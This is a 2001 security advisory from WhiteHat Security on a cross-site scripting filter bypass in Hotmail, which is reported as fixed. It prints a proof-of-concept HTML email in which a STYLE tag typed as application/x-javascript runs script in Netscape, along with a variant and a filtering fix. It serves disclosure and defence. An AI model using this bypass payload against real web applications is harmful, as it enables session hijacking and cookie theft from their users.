WhiteHat Security 
Security Advisory [Number: WH-08152001-1]
Copyright 2001 WhiteHat Security


===================================================
= Hotmail [CSS Vulnerability (New Strain) FIXED!] =
= Advisory Release Date: Aug 15, 2001         	  =
===================================================

Warning! This strain of Cross Site Scripting vulnerability may effect
many more web applications beyond Microsoft Hotmail. CERT and others have 
previously issued CSS advisories in the past, however, this vulnerability is 
different from those previously posted. Web Sites that already take 
diligent steps to filter out unwanted HTML and JavaScript should take 
careful notice as examples will show a new way to circumvent HTML/JavaScript 
filters.


Microsoft Security Response Center issued the following statement:

Microsoft received the report of this vulnerability on August 
10, 2001. By mid-day Aug 13, the issue had been investigated 
and confirmed, and the needed software changes had been made 
and deployed to all Hotmail servers.  Microsoft would like to 
thank Jeremiah Grossman of WhiteHat Security (www.whitehatsec.com) 
for bringing the issue to our attention and working with us 
to protect Hotmail customers.



This document can be obtained from:
http://www.whitehatsec.com/labs/advisories/WH-Security_Advisory-08152001.txt
http://www.whitehatsec.com/labs/advisories/WH-Security_Advisory-08152001.html



[Systems Affected]

 * Microsoft Hotmail
 * All Web Application accepting user submitted HTML content
 * Netscape Web Browsers


[Background & Overview]


Many Web Applications generate dynamic HTML web pages using user-submitted
data and other sources of "untrusted content." Web Applications not meticulously
filtering this untrusted content before presenting the web page to the user may 
allow for the manipulation of the web page and its content interpretation by a 
web browser.

This issue becomes dangerous when untrusted content is able to be inserted into 
a dynamic HTML web page via a web application or other means, causing the content 
to execute potentially malicious code within a users browser with the exact same 
privileges of the ligitimate web server.

Many Web Applications such as, Microsoft Hotmail, already meticulously filter 
incoming untrusted data before the content reaches their users. However, given 
the loose interpretation of HTML/JavaScript/VBScript etc. by various web browsers, 
obfuscated content may elude the current filters and execute within the users 
browser environment.


   
[Vulnerability Description]

This is a simple proof of concept vulnerability that illustrates
how the sending of a crafted HTML email with the enclosed
body will auto-execute JavaScript when the email is read.


** NOTE: Example will only execute JavaScript under Netscape **

==============================================
sendmail -t <target>@hotmail.com

MIME-Version: 1.0
From: The Attacker <foos@bar.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: Style JavaScript Execution Example

<HTML><BODY>

<STYLE TYPE="application/x-javascript">

alert('JavaScript has been Executed');

</STYLE>

</BODY></HTML>
.
====================================================
 
The key to this vulnerability is the "application/x-javascript" MIME-TYPE of the 
"TYPE" attribute. This causes the following expression to be interpreted as 
JavaScript.


Similar JavaScript filter-bypass examples have been disclosed which are similar:

<STYLE TYPE="text/javascript">
alert('JavaScript has been Executed');
</STYLE>

However, the different MIME-TYPE alterations may allow this new vulnerability 
to bypass many currently implemented JavaScript filters across many web 
applications.





[Impact]

Given that in this instance, malicious scripts are executed within the same scope
and possess the same security privileges as the legitimate web site, the attacker 
can exercise full control over the document the user received. This power includes
the entirety of the accessible Document Object Model and the transporting of 
gathered information to an off domain location for later retrieval.


Example Attacks:
	Web Proxy Monitoring
	Cookie Theft
	Access Restricted Domains


[Solution]
As per White Hat Security's disclosure policy of informing vendors of discovered
vulnerabilities, Microsoft Hotmail has fixed the reported issue effective 1 PM 
PST Aug 14, 2001

** NOTE: Web Applications not allowing any HTML to be submitted from untrusted
sources should be immune to this vulnerability **


Web Applications accepting "STYLE" tags to be submitted within their web
environment must take special care as to the "TYPE" attribute.

<STYLE TYPE="application/x-javascript">
alert('JavaScript Executed');
</STYLE>

The "application/x-javascript" MIME Type must be appropriately filtered
to deny execution of the javascript expression.

Example:

<STYLE TYPE="application/NOJS">
alert('JavaScript Executed');
</STYLE>

Will render content unexcecutable.




[References]

CERTŪ Advisory CA-2000-02 Malicious HTML Tags
Embedded in Client Web Requests
http://www.cert.org/advisories/CA-2000-02.html


Understanding Malicious Content Mitigation for Web Developers
http://www.cert.org/tech_tips/malicious_code_mitigation.html


The Dangers of Allowing Users to Post Images 
(Cross-Site Request Forgeries)
http://www.securiteam.com/securitynews/5FP0C204KE.html





[Authors] 

Jeremiah Grossman



[Credits]

Would like to thank Steve Lipner and Scott from the
Microsoft Security Response Center and also Rick Eames from 
Hotmail Development Team for their exceptional response and
resolution time.



[WhiteHat Security Contact Information]

 1270 Pohuli Way
 Makawao, HI 96768
 Tol Free (888) 373 5004
 Tel (808) 575 5114
 Fax (413) 778-7792 
 info@whitehatsec.com
 
______________________________________________________________________
Warranties and Disclaimers
INFORMATION ON THIS DOCUMENT IS PROVIDED TO YOU "AS IS" WITHOUT
WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
FITNESS FOR PARTICULAR PURPOSE, OR NON-INFRINGEMENT. WHITEHAT
SECURITIES, INC. DOES NOT REPRESENT OR WARRANT THE INFORMATION
ACCESSIBLE VIA THIS DOCUMENT IS ACCURATE, COMPLETE OR CURRENT. 

IN NO EVENT SHALL WHITEHAT SECURITIES, INC. OR ANY OF ITS
DIRECTORS, EMPLOYEES OR OTHER REPRESENTATIVES BE LIABLE FOR
ANY SPECIAL, INCIDENTAL, INDIRECT OR CONSEQUENTIAL DAMAGES OF
ANY KIND INCLUDING, WITHOUT LIMITATION, THOSE RESULTING FROM
LOSS OF DATA, INCOME, PROFIT, AND ON AY THEORY OF LIABILITY,
ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
THIS DOCUMENT. 

THIS DOCUMENT COULD INCLUDE TECHNICAL INACCURACIES OR
TYPOGRAPHICAL ERRORS. CHANGES ARE PERIODICALLY ADDED TO THE
INFORMATION HEREIN; THESE CHANGES WILL BE INCORPORATED IN NEW
EDITIONS OF THIS DOCUMENT. WHITEHAT SECURITIES, INC. MAY MAKE
IMPROVEMENTS AND/OR CHANGES IN THE PRODUCT(S) AND/OR PROGRAM(S) 
DESCRIBED IN THIS WEB SITE AT ANY TIME. March 30, 2001
______________________________________________________________________